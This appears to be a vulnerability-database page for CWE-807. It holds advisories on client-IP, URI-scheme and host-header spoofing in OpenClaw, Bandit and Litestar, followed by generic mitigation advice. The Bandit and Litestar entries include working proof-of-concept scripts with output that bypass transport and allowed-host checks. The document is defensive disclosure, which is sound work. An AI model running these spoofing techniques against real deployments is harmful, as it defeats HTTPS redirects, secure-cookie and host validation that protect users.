Possible client-IP spoofing in security-sensitive paths (for example auth rate-limit identity and local/private classification) for deployments behind trusted proxies with non-recommended forwarding behavior.
Scope Note
OpenClaw docs recommend reverse proxies overwrite (not append/preserve) inbound forwarding headers. This condition reduces severity.
Fix Commit(s)
07039dc089e51589a213ec0d16f8d6f2cd871fa18877bfd11ec7760b115b2d0d7500a45da2749747
Release Process Note
patched_versions is pre-set to the planned next release (2026.2.21). After npm release is out, publish this advisory.
OpenClaw thanks @AnthonyDiSanti for reporting.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2026.2.19-2"
},
"package": {
"ecosystem": "npm",
"name": "openclaw"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2026.2.21"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32029"
],
"database_specific": {
"cwe_ids": [
"CWE-345",
"CWE-807"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-03T22:17:12Z",
"nvd_published_at": "2026-03-19T22:16:38Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nOpenClaw used left-most `X-Forwarded-For` values when requests came from configured trusted proxies. In proxy chains that append/preserve header values, this could let attacker-controlled header content influence security decisions tied to client IP.\n\n### Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `\u003c= 2026.2.19-2`\n- Patched: `2026.2.21` (planned next release)\n\n### Impact\n\nPossible client-IP spoofing in security-sensitive paths (for example auth rate-limit identity and local/private classification) for deployments behind trusted proxies with non-recommended forwarding behavior.\n\n### Scope Note\n\nOpenClaw docs recommend reverse proxies overwrite (not append/preserve) inbound forwarding headers. This condition reduces severity.\n\n### Fix Commit(s)\n\n- `07039dc089e51589a213ec0d16f8d6f2cd871fa1`\n- `8877bfd11ec7760b115b2d0d7500a45da2749747`\n\n### Release Process Note\n\n`patched_versions` is pre-set to the planned next release (`2026.2.21`). After npm release is out, publish this advisory.\n\nOpenClaw thanks @AnthonyDiSanti for reporting.",
"id": "GHSA-2rgf-hm63-5qph",
"modified": "2026-03-25T18:47:26Z",
"published": "2026-03-03T22:17:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2rgf-hm63-5qph"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32029"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/commit/07039dc089e51589a213ec0d16f8d6f2cd871fa1"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/commit/8877bfd11ec7760b115b2d0d7500a45da2749747"
},
{
"type": "PACKAGE",
"url": "https://github.com/openclaw/openclaw"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/openclaw-client-ip-spoofing-via-x-forwarded-for-header-parsing"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "OpenClaw improperly parses X-Forwarded-For behind trusted proxies allows client IP spoofing in security decisions"
}
GHSA-375F-4R2H-F99J
Vulnerability from github – Published: 2026-05-07 03:47 – Updated: 2026-05-07 03:47Summary
Bandit reflects the client-supplied URI scheme into conn.scheme without verifying the actual transport. Over a plaintext HTTP/1.1 connection (or h2c), an unauthenticated attacker can send an absolute-form request target like GET https://victim/path HTTP/1.1 and the application observes conn.scheme = :https even though no TLS was negotiated. Any downstream Plug logic that trusts conn.scheme as a security signal — Plug.SSL's "already secure, don't redirect" branch, secure: true cookie flagging, audit logging, CSRF/SameSite gating — is silently misled into treating an attacker's plaintext connection as encrypted.
The vulnerability was introduced on Jun 8, 2023: https://github.com/mtrudel/bandit/commit/ff2f829326cd5dcf7335939aef9775269d881e28
Details
The bug is in lib/bandit/pipeline.ex at determine_scheme/2 (around line 89). The function takes the request target's scheme and the transport's secure? flag and produces the URI scheme used to build the %Plug.Conn{}. The third match clause is {_, scheme} -> scheme — i.e. whenever the client supplies any scheme on the request target, the function returns that scheme verbatim and discards secure? entirely.
Two attacker-controlled inputs reach this code path:
- HTTP/1.1 absolute-form request targets (RFC 9112 §3.2.2), e.g. GET https://victim/path HTTP/1.1.
- HTTP/2 :scheme pseudo-header, which is a free-form string sent by the client.
Neither value is constrained to match the actual transport. On a plaintext TCP listener (or h2c), a client can declare https and Bandit will pass %URI{scheme: "https"} into Plug.Conn.Adapter.conn/5, producing conn.scheme == :https. There is no guard in determine_scheme/2; the discarding of secure? is deliberate.
Suggested fix: when secure? is true, force the scheme to "https"; when false, force it to "http" — or reject the request with 400 Bad Request if the supplied scheme disagrees with the transport's actual security state. Do not trust the client-supplied scheme.
PoC
A self-contained reproduction script is available below. It starts plaintext Bandit 1.10 on 127.0.0.1:4321 with a Plug that echoes conn.scheme, opens a plain TCP socket, and sends:
GET https://127.0.0.1:4321/ HTTP/1.1
Host: 127.0.0.1:4321
Connection: close
A correctly-behaving server would either coerce conn.scheme to :http or return 400 Bad Request. Bandit 1.10.4 returns :https, confirming the spoof.
Impact
Transport-state spoofing. Any unauthenticated client speaking plaintext HTTP/1.1 or h2c to a Bandit endpoint can cause the application to treat the connection as if it had been TLS-protected. Concrete consequences in real Phoenix/Plug stacks include:
Plug.SSLskipping its HTTP→HTTPS redirect because the request "already looks secure", letting plaintext requests bypass the redirect entirely.- Cookies emitted with
secure: trueon a plaintext response, where a network attacker could capture them. - Audit logs recording requests as having arrived over HTTPS when they did not, breaking forensic and compliance assumptions.
- Application code that uses
conn.schemeto gate CSRF/SameSite policy, OAuth redirect URIs, or HSTS-related decisions making the wrong call.
The vulnerability is unauthenticated and trivially automatable; severity is medium because exploitation requires the deployment to expose a plaintext Bandit listener (or h2c) and to have downstream code that branches on conn.scheme.
Script and Logs
# Bandit reflects the client-supplied scheme into conn.scheme.
#
# lib/bandit/pipeline.ex:89 (determine_scheme/2) returns whatever scheme
# appears on the request target, ignoring the `secure?` flag that records
# the actual transport state. HTTP/1.1 absolute-form request targets
# (e.g. `GET https://victim/path HTTP/1.1`) and HTTP/2 `:scheme` are both
# attacker-controlled strings that flow into this function. Over a
# plaintext connection, a client can claim `https` and Bandit hands a
# `%Plug.Conn{scheme: :https}` to the application — even though no TLS
# was negotiated.
#
# Downstream Plug consumers that branch on `conn.scheme` are misled:
# Plug.SSL's "already secure, don't redirect" path, `secure: true` cookie
# flagging, audit logs, CSRF/SameSite gating, etc.
#
# This script starts plaintext Bandit 1.10 on 127.0.0.1:4321, sends one
# HTTP/1.1 absolute-form request with scheme `https://`, and prints the
# `conn.scheme` the application observes. A fixed server should report
# `:http` (or reject the request); the buggy server reports `:https`.
#
# Run: elixir scripts/bandit/http1_scheme_spoofing.exs
Mix.install([
{:bandit, "~> 1.10"},
{:plug, "~> 1.19"}
])
defmodule SchemeApp do
@behaviour Plug
def init(opts), do: opts
def call(conn, _opts) do
body = "This is what the Plug sees: conn.scheme=#{inspect(conn.scheme)}\n"
Plug.Conn.send_resp(conn, 200, body)
end
end
defmodule SchemeSpoof do
@port 4321
def run do
{:ok, _} = Bandit.start_link(plug: SchemeApp, ip: {127, 0, 0, 1}, port: @port)
{:ok, sock} = :gen_tcp.connect(~c"127.0.0.1", @port, [:binary, active: false])
# Absolute-form request target with scheme "https" over a plaintext
# TCP connection. RFC 9112 §3.2.2 allows absolute-form on any request;
# nothing about it implies the connection is TLS.
request =
"GET https://127.0.0.1:#{@port}/ HTTP/1.1\r\n" <>
"Host: 127.0.0.1:#{@port}\r\n" <>
"Connection: close\r\n" <>
"\r\n"
log("Sending plaintext HTTP/1.1 request with absolute-form target `https://…/`.")
:ok = :gen_tcp.send(sock, request)
{:ok, response} = :gen_tcp.recv(sock, 0, 5_000)
:gen_tcp.close(sock)
log("Server response:")
IO.puts(response)
cond do
response =~ "conn.scheme=:https" ->
log("VULNERABLE — application sees conn.scheme = :https on a plaintext socket.")
log("Plug.SSL's `already-secure` branch, `secure: true` cookies, etc. would all trust this.")
response =~ "conn.scheme=:http" ->
log("Server forced scheme to :http — bug appears patched.")
true ->
log("Unexpected response shape.")
end
end
defp log(message), do: IO.puts("[#{Time.utc_now() |> Time.truncate(:millisecond)}] #{message}")
end
SchemeSpoof.run()
12:53:25.297 [info] Running SchemeApp with Bandit 1.10.4 at 127.0.0.1:4321 (http)
[10:53:25.305] Sending plaintext HTTP/1.1 request with absolute-form target `https://…/`.
[10:53:25.316] Server response:
HTTP/1.1 200 OK
date: Tue, 28 Apr 2026 10:53:25 GMT
content-length: 47
vary: accept-encoding
cache-control: max-age=0, private, must-revalidate
This is what the Plug sees: conn.scheme=:https
[10:53:25.316] VULNERABLE — application sees conn.scheme = :https on a plaintext socket.
[10:53:25.316] Plug.SSL's `already-secure` branch, `secure: true` cookies, etc. would all trust this.
{
"affected": [
{
"package": {
"ecosystem": "Hex",
"name": "bandit"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.11.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-39807"
],
"database_specific": {
"cwe_ids": [
"CWE-807"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-07T03:47:29Z",
"nvd_published_at": "2026-05-01T21:16:17Z",
"severity": "MODERATE"
},
"details": "### Summary\nBandit reflects the client-supplied URI scheme into `conn.scheme` without verifying the actual transport. Over a plaintext HTTP/1.1 connection (or h2c), an unauthenticated attacker can send an absolute-form request target like `GET https://victim/path HTTP/1.1` and the application observes `conn.scheme = :https` even though no TLS was negotiated. Any downstream Plug logic that trusts `conn.scheme` as a security signal \u2014 `Plug.SSL`\u0027s \"already secure, don\u0027t redirect\" branch, `secure: true` cookie flagging, audit logging, CSRF/SameSite gating \u2014 is silently misled into treating an attacker\u0027s plaintext connection as encrypted.\n\nThe vulnerability was introduced on Jun 8, 2023: https://github.com/mtrudel/bandit/commit/ff2f829326cd5dcf7335939aef9775269d881e28\n\n### Details\nThe bug is in `lib/bandit/pipeline.ex` at `determine_scheme/2` (around line 89). The function takes the request target\u0027s scheme and the transport\u0027s `secure?` flag and produces the URI scheme used to build the `%Plug.Conn{}`. The third match clause is `{_, scheme} -\u003e scheme` \u2014 i.e. whenever the client supplies *any* scheme on the request target, the function returns that scheme verbatim and discards `secure?` entirely.\n\nTwo attacker-controlled inputs reach this code path:\n- HTTP/1.1 absolute-form request targets (RFC 9112 \u00a73.2.2), e.g. `GET https://victim/path HTTP/1.1`.\n- HTTP/2 `:scheme` pseudo-header, which is a free-form string sent by the client.\n\nNeither value is constrained to match the actual transport. On a plaintext TCP listener (or h2c), a client can declare `https` and Bandit will pass `%URI{scheme: \"https\"}` into `Plug.Conn.Adapter.conn/5`, producing `conn.scheme == :https`. There is no guard in `determine_scheme/2`; the discarding of `secure?` is deliberate.\n\n**Suggested fix:** when `secure?` is `true`, force the scheme to `\"https\"`; when `false`, force it to `\"http\"` \u2014 or reject the request with `400 Bad Request` if the supplied scheme disagrees with the transport\u0027s actual security state. Do not trust the client-supplied scheme.\n\n### PoC\nA self-contained reproduction script is available below. It starts plaintext Bandit 1.10 on `127.0.0.1:4321` with a Plug that echoes `conn.scheme`, opens a plain TCP socket, and sends:\n\n```\nGET https://127.0.0.1:4321/ HTTP/1.1\nHost: 127.0.0.1:4321\nConnection: close\n```\n\nA correctly-behaving server would either coerce `conn.scheme` to `:http` or return `400 Bad Request`. Bandit 1.10.4 returns `:https`, confirming the spoof.\n\n### Impact\nTransport-state spoofing. Any unauthenticated client speaking plaintext HTTP/1.1 or h2c to a Bandit endpoint can cause the application to treat the connection as if it had been TLS-protected. Concrete consequences in real Phoenix/Plug stacks include:\n\n- `Plug.SSL` skipping its HTTP\u2192HTTPS redirect because the request \"already looks secure\", letting plaintext requests bypass the redirect entirely.\n- Cookies emitted with `secure: true` on a plaintext response, where a network attacker could capture them.\n- Audit logs recording requests as having arrived over HTTPS when they did not, breaking forensic and compliance assumptions.\n- Application code that uses `conn.scheme` to gate CSRF/SameSite policy, OAuth redirect URIs, or HSTS-related decisions making the wrong call.\n\nThe vulnerability is unauthenticated and trivially automatable; severity is medium because exploitation requires the deployment to expose a plaintext Bandit listener (or h2c) and to have downstream code that branches on `conn.scheme`.\n\n### Script and Logs\n\n```elixir\n# Bandit reflects the client-supplied scheme into conn.scheme.\n#\n# lib/bandit/pipeline.ex:89 (determine_scheme/2) returns whatever scheme\n# appears on the request target, ignoring the `secure?` flag that records\n# the actual transport state. HTTP/1.1 absolute-form request targets\n# (e.g. `GET https://victim/path HTTP/1.1`) and HTTP/2 `:scheme` are both\n# attacker-controlled strings that flow into this function. Over a\n# plaintext connection, a client can claim `https` and Bandit hands a\n# `%Plug.Conn{scheme: :https}` to the application \u2014 even though no TLS\n# was negotiated.\n#\n# Downstream Plug consumers that branch on `conn.scheme` are misled:\n# Plug.SSL\u0027s \"already secure, don\u0027t redirect\" path, `secure: true` cookie\n# flagging, audit logs, CSRF/SameSite gating, etc.\n#\n# This script starts plaintext Bandit 1.10 on 127.0.0.1:4321, sends one\n# HTTP/1.1 absolute-form request with scheme `https://`, and prints the\n# `conn.scheme` the application observes. A fixed server should report\n# `:http` (or reject the request); the buggy server reports `:https`.\n#\n# Run: elixir scripts/bandit/http1_scheme_spoofing.exs\n\nMix.install([\n {:bandit, \"~\u003e 1.10\"},\n {:plug, \"~\u003e 1.19\"}\n])\n\ndefmodule SchemeApp do\n @behaviour Plug\n def init(opts), do: opts\n\n def call(conn, _opts) do\n body = \"This is what the Plug sees: conn.scheme=#{inspect(conn.scheme)}\\n\"\n Plug.Conn.send_resp(conn, 200, body)\n end\nend\n\ndefmodule SchemeSpoof do\n @port 4321\n\n def run do\n {:ok, _} = Bandit.start_link(plug: SchemeApp, ip: {127, 0, 0, 1}, port: @port)\n\n {:ok, sock} = :gen_tcp.connect(~c\"127.0.0.1\", @port, [:binary, active: false])\n\n # Absolute-form request target with scheme \"https\" over a plaintext\n # TCP connection. RFC 9112 \u00a73.2.2 allows absolute-form on any request;\n # nothing about it implies the connection is TLS.\n request =\n \"GET https://127.0.0.1:#{@port}/ HTTP/1.1\\r\\n\" \u003c\u003e\n \"Host: 127.0.0.1:#{@port}\\r\\n\" \u003c\u003e\n \"Connection: close\\r\\n\" \u003c\u003e\n \"\\r\\n\"\n\n log(\"Sending plaintext HTTP/1.1 request with absolute-form target `https://\u2026/`.\")\n :ok = :gen_tcp.send(sock, request)\n\n {:ok, response} = :gen_tcp.recv(sock, 0, 5_000)\n :gen_tcp.close(sock)\n\n log(\"Server response:\")\n IO.puts(response)\n\n cond do\n response =~ \"conn.scheme=:https\" -\u003e\n log(\"VULNERABLE \u2014 application sees conn.scheme = :https on a plaintext socket.\")\n log(\"Plug.SSL\u0027s `already-secure` branch, `secure: true` cookies, etc. would all trust this.\")\n\n response =~ \"conn.scheme=:http\" -\u003e\n log(\"Server forced scheme to :http \u2014 bug appears patched.\")\n\n true -\u003e\n log(\"Unexpected response shape.\")\n end\n end\n\n defp log(message), do: IO.puts(\"[#{Time.utc_now() |\u003e Time.truncate(:millisecond)}] #{message}\")\nend\n\nSchemeSpoof.run()\n```\n\n```logs\n12:53:25.297 [info] Running SchemeApp with Bandit 1.10.4 at 127.0.0.1:4321 (http)\n[10:53:25.305] Sending plaintext HTTP/1.1 request with absolute-form target `https://\u2026/`.\n[10:53:25.316] Server response:\nHTTP/1.1 200 OK\ndate: Tue, 28 Apr 2026 10:53:25 GMT\ncontent-length: 47\nvary: accept-encoding\ncache-control: max-age=0, private, must-revalidate\n\nThis is what the Plug sees: conn.scheme=:https\n\n[10:53:25.316] VULNERABLE \u2014 application sees conn.scheme = :https on a plaintext socket.\n[10:53:25.316] Plug.SSL\u0027s `already-secure` branch, `secure: true` cookies, etc. would all trust this.\n```",
"id": "GHSA-375f-4r2h-f99j",
"modified": "2026-05-07T03:47:29Z",
"published": "2026-05-07T03:47:29Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/mtrudel/bandit/security/advisories/GHSA-375f-4r2h-f99j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39807"
},
{
"type": "WEB",
"url": "https://github.com/mtrudel/bandit/commit/45feea20dea8af7ffd7245271107b695c040e667"
},
{
"type": "WEB",
"url": "https://cna.erlef.org/cves/CVE-2026-39807.html"
},
{
"type": "PACKAGE",
"url": "https://github.com/mtrudel/bandit"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/EEF-CVE-2026-39807"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Bandit trusts client-supplied URI scheme on plaintext connections"
}
GHSA-3PC4-PJ89-2J67
Vulnerability from github – Published: 2022-03-10 00:00 – Updated: 2022-03-17 00:02A Reliance on Untrusted Inputs in a Security Decision vulnerability in the login proxy of the openSUSE Build service allowed attackers to present users with a expected login form that then sends the clear text credentials to an attacker specified server. This issue affects: openSUSE Build service login-proxy-scripts versions prior to dc000cdfe9b9b715fb92195b1a57559362f689ef.
{
"affected": [],
"aliases": [
"CVE-2021-36777"
],
"database_specific": {
"cwe_ids": [
"CWE-807"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-03-09T17:15:00Z",
"severity": "HIGH"
},
"details": "A Reliance on Untrusted Inputs in a Security Decision vulnerability in the login proxy of the openSUSE Build service allowed attackers to present users with a expected login form that then sends the clear text credentials to an attacker specified server.\nThis issue affects:\nopenSUSE Build service\nlogin-proxy-scripts versions prior to dc000cdfe9b9b715fb92195b1a57559362f689ef.",
"id": "GHSA-3pc4-pj89-2j67",
"modified": "2022-03-17T00:02:41Z",
"published": "2022-03-10T00:00:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36777"
},
{
"type": "WEB",
"url": "https://bugzilla.suse.com/show_bug.cgi?id=1191209"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-3QMC-CJ7Q-62HV
Vulnerability from github – Published: 2026-06-10 19:12 – Updated: 2026-06-10 19:12Summary
AllowedHostsMiddleware trusts the X-Forwarded-Host header as a fallback when the Host header is absent. Since X-Forwarded-Host is a client-controllable header, an attacker can bypass the allowed hosts validation by omitting the Host header and supplying an X-Forwarded-Host header set to a whitelisted domain. This enables host header injection attacks such as password reset poisoning, cache poisoning, and server-side request routing manipulation.
Details
In AllowedHostsMiddleware.__call__, the host value used for validation is resolved as follows:
https://github.com/litestar-org/litestar/blob/main/litestar/middleware/allowed_hosts.py#L68
headers = MutableScopeHeaders(scope=scope)
if host := headers.get("host", headers.get("x-forwarded-host", "")).split(":")[0]:
if self.allowed_hosts_regex.fullmatch(host):
await self.app(scope, receive, send)
return
When Host is absent (e.g., HTTP/1.0 clients, misconfigured proxies, or raw TCP connections), the middleware falls back to X-Forwarded-Host without any verification that the request actually passed through a trusted reverse proxy.
An attacker can send a request with no Host header and set X-Forwarded-Host to any whitelisted domain, bypassing the entire allowed hosts check. The application then processes the request as if it originated from a trusted host.
This is particularly dangerous when applications use the resolved host value for:
- Generating password reset links (Host header injection → link points to attacker domain)
- Cache key generation (cache poisoning)
- Routing or backend selection decisions
PoC
"""
PoC: Allowed Hosts Bypass via X-Forwarded-Host in Litestar 3.0.0b0
Affected:
litestar/middleware/allowed_hosts.py:68
-> headers.get("host", headers.get("x-forwarded-host", "")).split(":")[0]
"""
import asyncio
from litestar import Litestar, get
from litestar.config.allowed_hosts import AllowedHostsConfig
from litestar.testing import TestClient
@get("/")
async def index() -> dict:
return {"status": "ok"}
app = Litestar(
route_handlers=[index],
allowed_hosts=AllowedHostsConfig(allowed_hosts=["trusted.example.com"]),
)
# --- 1. Baseline: invalid host is blocked ---
with TestClient(app=app) as c:
resp = c.get("/", headers={"host": "evil.com"})
assert resp.status_code == 400
print(f"[*] Host: evil.com -> {resp.status_code} (blocked)")
# --- 2. Bypass: ASGI scope without Host, with X-Forwarded-Host ---
async def test_bypass():
scope = {
"type": "http",
"method": "GET",
"path": "/",
"root_path": "",
"scheme": "http",
"query_string": b"",
"headers": [
# No "host" header — only x-forwarded-host
(b"x-forwarded-host", b"trusted.example.com"),
],
"server": ("testserver", 80),
"app": app,
"litestar_app": app,
"state": {},
}
captured = {}
async def receive():
return {"type": "http.request", "body": b""}
async def send(message):
if message["type"] == "http.response.start":
captured["status"] = message["status"]
await app(scope, receive, send)
return captured["status"]
status = asyncio.run(test_bypass())
print(f"[*] No Host + X-Forwarded-Host: trusted.example.com -> {status} (bypassed)")
assert status == 200, f"Expected 200, got {status}"
print(f"[!] AllowedHosts check passed using client-controlled X-Forwarded-Host")
Output:
[*] Host: evil.com -> 400 (blocked)
[*] No Host + X-Forwarded-Host: trusted.example.com -> 200 (bypassed)
[!] AllowedHosts check passed using client-controlled X-Forwarded-Host
Impact
This is a host validation bypass vulnerability. Any application using AllowedHostsConfig is affected when deployed without a reverse proxy that strips X-Forwarded-Host, or when accepting HTTP/1.0 connections.
An attacker can bypass the allowed hosts restriction and have requests processed as if they originated from a trusted host. This can lead to:
- Password reset poisoning: if the application uses the host value to generate reset links, the attacker can redirect them to a malicious domain
- Cache poisoning: cached responses keyed on the host value can be polluted with attacker-controlled content
- Routing manipulation: backend routing decisions based on host value can be influenced
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "litestar"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.22.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48061"
],
"database_specific": {
"cwe_ids": [
"CWE-348",
"CWE-807"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-10T19:12:10Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\n\n`AllowedHostsMiddleware` trusts the `X-Forwarded-Host` header as a fallback when the `Host` header is absent. Since `X-Forwarded-Host` is a client-controllable header, an attacker can bypass the allowed hosts validation by omitting the `Host` header and supplying an `X-Forwarded-Host` header set to a whitelisted domain. This enables host header injection attacks such as password reset poisoning, cache poisoning, and server-side request routing manipulation.\n\n### Details\n\nIn `AllowedHostsMiddleware.__call__`, the host value used for validation is resolved as follows:\n\nhttps://github.com/litestar-org/litestar/blob/main/litestar/middleware/allowed_hosts.py#L68\n\n```python\nheaders = MutableScopeHeaders(scope=scope)\nif host := headers.get(\"host\", headers.get(\"x-forwarded-host\", \"\")).split(\":\")[0]:\n if self.allowed_hosts_regex.fullmatch(host):\n await self.app(scope, receive, send)\n return\n```\n\nWhen `Host` is absent (e.g., HTTP/1.0 clients, misconfigured proxies, or raw TCP connections), the middleware falls back to `X-Forwarded-Host` without any verification that the request actually passed through a trusted reverse proxy.\n\nAn attacker can send a request with no `Host` header and set `X-Forwarded-Host` to any whitelisted domain, bypassing the entire allowed hosts check. The application then processes the request as if it originated from a trusted host.\n\nThis is particularly dangerous when applications use the resolved host value for:\n- Generating password reset links (`Host` header injection \u2192 link points to attacker domain)\n- Cache key generation (cache poisoning)\n- Routing or backend selection decisions\n\n### PoC\n\n```python\n\"\"\"\nPoC: Allowed Hosts Bypass via X-Forwarded-Host in Litestar 3.0.0b0\n\nAffected:\n litestar/middleware/allowed_hosts.py:68\n -\u003e headers.get(\"host\", headers.get(\"x-forwarded-host\", \"\")).split(\":\")[0]\n\"\"\"\n\nimport asyncio\nfrom litestar import Litestar, get\nfrom litestar.config.allowed_hosts import AllowedHostsConfig\nfrom litestar.testing import TestClient\n\n\n@get(\"/\")\nasync def index() -\u003e dict:\n return {\"status\": \"ok\"}\n\n\napp = Litestar(\n route_handlers=[index],\n allowed_hosts=AllowedHostsConfig(allowed_hosts=[\"trusted.example.com\"]),\n)\n\n\n# --- 1. Baseline: invalid host is blocked ---\n\nwith TestClient(app=app) as c:\n resp = c.get(\"/\", headers={\"host\": \"evil.com\"})\n assert resp.status_code == 400\n print(f\"[*] Host: evil.com -\u003e {resp.status_code} (blocked)\")\n\n\n# --- 2. Bypass: ASGI scope without Host, with X-Forwarded-Host ---\n\nasync def test_bypass():\n scope = {\n \"type\": \"http\",\n \"method\": \"GET\",\n \"path\": \"/\",\n \"root_path\": \"\",\n \"scheme\": \"http\",\n \"query_string\": b\"\",\n \"headers\": [\n # No \"host\" header \u2014 only x-forwarded-host\n (b\"x-forwarded-host\", b\"trusted.example.com\"),\n ],\n \"server\": (\"testserver\", 80),\n \"app\": app,\n \"litestar_app\": app,\n \"state\": {},\n }\n\n captured = {}\n\n async def receive():\n return {\"type\": \"http.request\", \"body\": b\"\"}\n\n async def send(message):\n if message[\"type\"] == \"http.response.start\":\n captured[\"status\"] = message[\"status\"]\n\n await app(scope, receive, send)\n return captured[\"status\"]\n\nstatus = asyncio.run(test_bypass())\nprint(f\"[*] No Host + X-Forwarded-Host: trusted.example.com -\u003e {status} (bypassed)\")\nassert status == 200, f\"Expected 200, got {status}\"\nprint(f\"[!] AllowedHosts check passed using client-controlled X-Forwarded-Host\")\n```\n\n**Output:**\n```\n[*] Host: evil.com -\u003e 400 (blocked)\n[*] No Host + X-Forwarded-Host: trusted.example.com -\u003e 200 (bypassed)\n[!] AllowedHosts check passed using client-controlled X-Forwarded-Host\n```\n\n### Impact\n\nThis is a host validation bypass vulnerability. Any application using `AllowedHostsConfig` is affected when deployed without a reverse proxy that strips `X-Forwarded-Host`, or when accepting HTTP/1.0 connections.\n\nAn attacker can bypass the allowed hosts restriction and have requests processed as if they originated from a trusted host. This can lead to:\n\n- **Password reset poisoning**: if the application uses the host value to generate reset links, the attacker can redirect them to a malicious domain\n- **Cache poisoning**: cached responses keyed on the host value can be polluted with attacker-controlled content\n- **Routing manipulation**: backend routing decisions based on host value can be influenced",
"id": "GHSA-3qmc-cj7q-62hv",
"modified": "2026-06-10T19:12:10Z",
"published": "2026-06-10T19:12:10Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/litestar-org/litestar/security/advisories/GHSA-3qmc-cj7q-62hv"
},
{
"type": "WEB",
"url": "https://github.com/litestar-org/litestar/commit/6930a20ceb543912cd651b42deae5b9f3637a262"
},
{
"type": "PACKAGE",
"url": "https://github.com/litestar-org/litestar"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Litestar: AllowedHostsMiddleware bypasses host validation via client-controlled X-Forwarded-Host header"
}
Mitigation MIT-14
Strategy: Attack Surface Reduction
- Store state information and sensitive data on the server side only.
- Ensure that the system definitively and unambiguously keeps track of its own state and user state and has rules defined for legitimate state transitions. Do not allow any application user to affect state directly in any way other than through legitimate actions leading to state transitions.
- If information must be stored on the client, do not do so without encryption and integrity checking, or otherwise having a mechanism on the server side to catch tampering. Use a message authentication code (MAC) algorithm, such as Hash Message Authentication Code (HMAC) [REF-529]. Apply this against the state or sensitive data that has to be exposed, which can guarantee the integrity of the data - i.e., that the data has not been modified. Ensure that a strong hash function is used (CWE-328).
Mitigation MIT-4.2
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
- With a stateless protocol such as HTTP, use a framework that maintains the state for you.
- Examples include ASP.NET View State [REF-756] and the OWASP ESAPI Session Management feature [REF-45].
- Be careful of language features that provide state support, since these might be provided as a convenience to the programmer and may not be considering security.
Mitigation MIT-15
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Mitigation MIT-16
Strategy: Environment Hardening
When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.
Mitigation MIT-6
Strategy: Attack Surface Reduction
- Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.
- Identify all inputs that are used for security decisions and determine if you can modify the design so that you do not have to rely on submitted inputs at all. For example, you may be able to keep critical information about the user's session on the server side instead of recording it within external data.
No CAPEC attack patterns related to this CWE.